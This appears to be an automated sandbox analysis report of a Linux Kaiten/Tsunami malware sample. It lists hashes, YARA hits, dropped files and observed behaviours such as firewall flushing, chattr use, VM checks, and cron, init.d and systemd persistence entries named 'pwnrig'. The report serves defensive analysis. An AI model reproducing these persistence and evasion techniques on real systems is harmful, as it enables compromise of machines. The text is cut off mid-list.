Analysis
-
max time kernel
149s -
max time network
151s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240221-en -
resource tags
arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system -
submitted
14-03-2024 01:44
Behavioral task
behavioral1
Sample
f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
Resource
ubuntu2004-amd64-20240221-en
General
-
Target
f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
-
Size
3.9MB
-
MD5
426155ff2d5a20f7164da55ff23cc94b
-
SHA1
71f5f60479f21702145008bb98c108a69ba8f34c
-
SHA256
f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712
-
SHA512
ae3c2dd95640d64a971a95af8a8aaf1effd150b0f8a37c46f902c991a66686c56210c8f2cf6ea00daa31c52731de6df2c4169b9279d387775b9d6c9739ecdc0b
-
SSDEEP
98304:7CuSt95TW1PvY22pKm2lGEhL4uQEMAlj664cLa1:7CuSt954A2WhcfRQrUUv1
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 10 IoCs
resource yara_rule behavioral1/memory/2152-2-0x00007f9b457c8000-0x00007f9b457dc700-memory.dmp family_kaiten2 behavioral1/memory/3328-9-0x00007fb4e442f000-0x00007fb4e4443700-memory.dmp family_kaiten2 behavioral1/memory/3865-12-0x00007fb4865cb000-0x00007fb4865df700-memory.dmp family_kaiten2 behavioral1/memory/4310-15-0x00007f3ce991d000-0x00007f3ce9931700-memory.dmp family_kaiten2 behavioral1/memory/4756-18-0x00007f90a420b000-0x00007f90a421f700-memory.dmp family_kaiten2 behavioral1/memory/5202-21-0x00007fa9ae224000-0x00007fa9ae238700-memory.dmp family_kaiten2 behavioral1/memory/5820-25-0x00007f1f458d9000-0x00007f1f458ed700-memory.dmp family_kaiten2 behavioral1/memory/6265-28-0x00007f1fe0d4b000-0x00007f1fe0d5f700-memory.dmp family_kaiten2 behavioral1/memory/6888-32-0x00007f5e9d8af000-0x00007f5e9d8c3700-memory.dmp family_kaiten2 behavioral1/memory/7333-35-0x00007f3adc346000-0x00007f3adc35a700-memory.dmp family_kaiten2 -
Detects Kaiten/Tsunami payload 10 IoCs
resource yara_rule behavioral1/memory/2152-2-0x00007f9b457c8000-0x00007f9b457dc700-memory.dmp family_kaiten behavioral1/memory/3328-9-0x00007fb4e442f000-0x00007fb4e4443700-memory.dmp family_kaiten behavioral1/memory/3865-12-0x00007fb4865cb000-0x00007fb4865df700-memory.dmp family_kaiten behavioral1/memory/4310-15-0x00007f3ce991d000-0x00007f3ce9931700-memory.dmp family_kaiten behavioral1/memory/4756-18-0x00007f90a420b000-0x00007f90a421f700-memory.dmp family_kaiten behavioral1/memory/5202-21-0x00007fa9ae224000-0x00007fa9ae238700-memory.dmp family_kaiten behavioral1/memory/5820-25-0x00007f1f458d9000-0x00007f1f458ed700-memory.dmp family_kaiten behavioral1/memory/6265-28-0x00007f1fe0d4b000-0x00007f1fe0d5f700-memory.dmp family_kaiten behavioral1/memory/6888-32-0x00007f5e9d8af000-0x00007f5e9d8c3700-memory.dmp family_kaiten behavioral1/memory/7333-35-0x00007f3adc346000-0x00007f3adc35a700-memory.dmp family_kaiten -
Executes dropped EXE 33 IoCs
ioc pid Process /etc/init.d/knlib 1775 knlib /tmp/sys-helper 2152 sys-helper /tmp/service-agent 2154 service-agent /tmp/service-agent 2526 service-agent /var/tmp/.klibsystem5-x 2604 .klibsystem5-x /tmp/service-agent 2802 service-agent /tmp/sys-helper 3328 sys-helper /tmp/service-agent 3332 service-agent /tmp/service-agent 3731 service-agent /tmp/sys-helper 3865 sys-helper /tmp/service-agent 3866 service-agent /tmp/service-agent 4212 service-agent /tmp/sys-helper 4310 sys-helper /tmp/service-agent 4311 service-agent /tmp/sys-helper 4756 sys-helper /tmp/service-agent 4757 service-agent /tmp/sys-helper 5202 Process not Found /tmp/service-agent 5203 Process not Found /tmp/service-agent 5548 Process not Found /var/tmp/.klibsystem5-x 5627 Process not Found /tmp/sys-helper 5820 Process not Found /tmp/service-agent 5821 Process not Found /tmp/service-agent 6166 Process not Found /tmp/sys-helper 6265 Process not Found /tmp/service-agent 6266 Process not Found /tmp/service-agent 6611 Process not Found /var/tmp/.klibsystem5-x 6690 Process not Found /tmp/sys-helper 6888 Process not Found /tmp/service-agent 6889 Process not Found /tmp/service-agent 7234 Process not Found /tmp/sys-helper 7333 Process not Found /tmp/service-agent 7334 Process not Found /tmp/service-agent 7679 Process not Found -
Flushes firewall rules 64 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 5636 Process not Found 6796 Process not Found 6829 Process not Found 2680 iptables 5645 Process not Found 2711 ip6tables 6751 Process not Found 5654 Process not Found 5695 Process not Found 5741 Process not Found 6732 Process not Found 2627 iptables 2656 iptables 2671 iptables 2752 ip6tables 6778 Process not Found 2700 ip6tables 2726 ip6tables 5648 Process not Found 6769 Process not Found 6836 Process not Found 2632 iptables 2743 ip6tables 5754 Process not Found 6831 Process not Found 6788 Process not Found 6802 Process not Found 2638 iptables 2756 ip6tables 5708 Process not Found 6755 Process not Found 2710 ip6tables 5732 Process not Found 6775 Process not Found 2708 ip6tables 6703 Process not Found 6727 Process not Found 6747 Process not Found 6820 Process not Found 2614 iptables 2646 iptables 2661 iptables 5698 Process not Found 2702 ip6tables 3395 update-rc.d 5666 Process not Found 6776 Process not Found 6795 Process not Found 2622 iptables 2657 iptables 2764 ip6tables 5670 Process not Found 3926 update-rc.d 6949 Process not Found 2751 ip6tables 6801 Process not Found 2616 iptables 5731 Process not Found 6837 Process not Found 2705 ip6tables 5796 Process not Found 5797 Process not Found 5676 Process not Found 6699 Process not Found -
ioc pid Process /usr/lib/modules/5.4.0-169-generic/kernel/net/ipv6/netfilter/ip6_tables.ko 1515 modprobe -
Reads EFI boot settings 64 IoCs
Reads EFI boot settings from the efivars filesystem, may contain security secrets or sensitive data.
description ioc Process File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found -
resource yara_rule behavioral1/files/fstream-6.dat upx behavioral1/files/fstream-15.dat upx behavioral1/files/fstream-17.dat upx behavioral1/files/fstream-38.dat upx behavioral1/files/fstream-101.dat upx behavioral1/files/fstream-102.dat upx behavioral1/files/fstream-196.dat upx behavioral1/files/fstream-268.dat upx behavioral1/files/fstream-321.dat upx -
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 3382 chattr 4307 chattr 5676 Process not Found 6738 Process not Found 6885 Process not Found 6931 Process not Found 6938 Process not Found 2806 hostname 3867 sh 5347 Process not Found 6467 Process not Found 7338 Process not Found 7390 Process not Found 5411 Process not Found 7335 Process not Found 2352 chattr 3314 chattr 3870 hostname 6933 Process not Found 2733 ip6tables 2794 chattr 5674 Process not Found 5791 Process not Found 3334 sh 4796 Process not Found 2624 iptables 4751 chattr 5783 Process not Found 5199 Process not Found 4076 chattr 5126 Process not Found 2193 sh 2736 ip6tables 2844 chattr 4298 chattr 5642 Process not Found 6821 Process not Found 6948 Process not Found 3326 chattr 3858 chattr 4804 Process not Found 5191 Process not Found 5207 Process not Found 6820 Process not Found 5756 Process not Found 2107 chattr 5257 Process not Found 5758 Process not Found 5760 Process not Found 2553 hostname 3319 chattr 4752 chattr 2800 chattr 3324 chattr 3908 chattr 6635 Process not Found 6705 Process not Found 7328 Process not Found 2728 ip6tables 2796 chattr 2851 chattr 7321 Process not Found 7478 Process not Found 4309 chattr -
Checks CPU configuration 1 TTPs 62 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo service-agent -
Checks hardware identifiers (DMI) 1 TTPs 64 IoCs
Checks DMI information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /etc/cron.d/pwnrig tee File opened for modification /etc/cron.d/pwnrig Process not Found File opened for modification /etc/cron.weekly/sedrIExF3 Process not Found File opened for modification /var/spool/cron/.lib-knlib4 f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf File opened for modification /etc/cron.weekly/pwnrig tee File opened for modification /etc/cron.monthly/sed0wJ3X8 sed File opened for modification /etc/cron.d/sedAa1cc9 sed File opened for modification /etc/cron.hourly/sedP3kkPr sed File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.monthly/sedavJjWH Process not Found File opened for modification /etc/cron.hourly/pwnrig Process not Found File opened for modification /etc/cron.monthly/.lib-knlib4 f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf File opened for modification /etc/cron.daily/sedOz40lb sed File opened for modification /etc/cron.weekly/sedGjHme9 sed File opened for modification /var/spool/cron/crontabs/tmp.mF0EUH crontab File opened for modification /etc/cron.monthly/seddx4gSq sed File opened for modification /etc/cron.monthly/sedAztbvi sed File opened for modification /etc/cron.weekly/sedMG9sug sed File opened for modification /etc/cron.monthly/pwnrig Process not Found File opened for modification /etc/cron.weekly/sedEkkLGa sed File opened for modification /etc/cron.hourly/pwnrig tee File opened for modification /etc/cron.hourly/sedfKXgN5 Process not Found File opened for modification /etc/cron.d/.lib-knlib4 f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf File opened for modification /etc/cron.d/pwnrig tee File opened for modification /var/spool/cron/.lib-knlib4 Process not Found File opened for modification /etc/cron.monthly/.lib-knlib4 Process not Found File opened for modification /etc/cron.d/sedSg8N5C sed File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /etc/cron.hourly/sedxnjuBH Process not Found File opened for modification /var/spool/cron/crontabs/tmp.URytza Process not Found File opened for modification /var/spool/cron/crontabs/tmp.gZNDyP Process not Found File opened for modification /etc/cron.monthly/sedvm3z39 Process not Found File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /etc/cron.hourly/sedM74NuD sed File opened for modification /etc/cron.hourly/pwnrig tee File opened for modification /var/spool/cron/crontabs/tmp.sgQd4r Process not Found File opened for modification /etc/cron.weekly/sed6y2qns Process not Found File opened for modification /etc/cron.d/sedS6mbzr sed File opened for modification /etc/cron.monthly/pwnrig Process not Found File opened for modification /etc/cron.d/sedtbuTjG Process not Found File opened for modification /var/spool/cron/crontabs/tmp.TGRmsV crontab File opened for modification /etc/cron.daily/sedNk72LB sed File opened for modification /var/spool/cron/crontabs/tmp.tVXByT Process not Found File opened for modification /etc/cron.daily/sedx79wpg sed File opened for modification /etc/cron.hourly/sedq0oyzf sed File opened for modification /etc/cron.monthly/sedHiMuWY Process not Found File opened for modification /etc/cron.monthly/sedBJHtrt Process not Found File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.weekly/sedyeqiEY Process not Found File opened for modification /var/spool/cron/crontabs/tmp.tYsywi crontab File opened for modification /etc/cron.weekly/sedM2yJrB sed File opened for modification /etc/cron.weekly/pwnrig Process not Found File opened for modification /etc/cron.weekly/pwnrig Process not Found File opened for modification /etc/cron.weekly/sedrwHOuO Process not Found File opened for modification /etc/cron.d/sedtEQnIa sed File opened for modification /var/spool/cron/crontabs/tmp.Cx180V crontab File opened for modification /etc/cron.hourly/sedIFjU30 Process not Found File opened for modification /etc/cron.hourly/sed5USWmt Process not Found File opened for modification /etc/cron.hourly/.lib-knlib4 Process not Found File opened for modification /etc/cron.daily/.lib-knlib4 Process not Found File opened for modification /etc/cron.d/sedCyviZ0 Process not Found File opened for modification /etc/cron.hourly/.lib-knlib4 f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf File opened for modification /etc/cron.hourly/seduSGRk9 sed -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for modification /etc/init.d/seduPx1zv Process not Found File opened for modification /etc/init.d/pwnrig Process not Found File opened for modification /etc/init.d/pwnrig Process not Found File opened for modification /etc/init.d/sedm8nea0 Process not Found File opened for modification /etc/init.d/sedUtzWcE Process not Found File opened for modification /etc/init.d/sedSqTKUV sed File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/pwnrig Process not Found File opened for modification /etc/init.d/sedffIlzh Process not Found File opened for modification /etc/init.d/sed9UdwLT Process not Found File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/sedjkYoyc sed File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/pwnrig Process not Found File opened for modification /etc/init.d/pwnrig Process not Found File opened for modification /etc/init.d/knlib f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/pwnrig Process not Found File opened for modification /etc/init.d/sedga5c13 sed File opened for modification /etc/init.d/sedIm2M34 sed File opened for modification /etc/init.d/sed8k56YM Process not Found -
Modifies systemd 1 TTPs 17 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /etc/systemd/system/knlibe.service f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /lib/systemd/system/pwnrigl.service Process not Found File opened for modification /lib/systemd/system/pwnrigl.service Process not Found File opened for modification /etc/systemd/system/pwnrige.service Process not Found File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /lib/systemd/system/pwnrigl.service Process not Found File opened for modification /etc/systemd/system/pwnrige.service Process not Found File opened for modification /etc/systemd/system/pwnrige.service Process not Found File opened for modification /lib/systemd/system/pwnrigl.service Process not Found File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /lib/systemd/system/pwnrigl.service Process not Found File opened for modification /etc/systemd/system/pwnrige.service Process not Found File opened for modification /etc/systemd/system/pwnrige.service Process not Found -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/possible Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/possible Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/types Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/types Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading 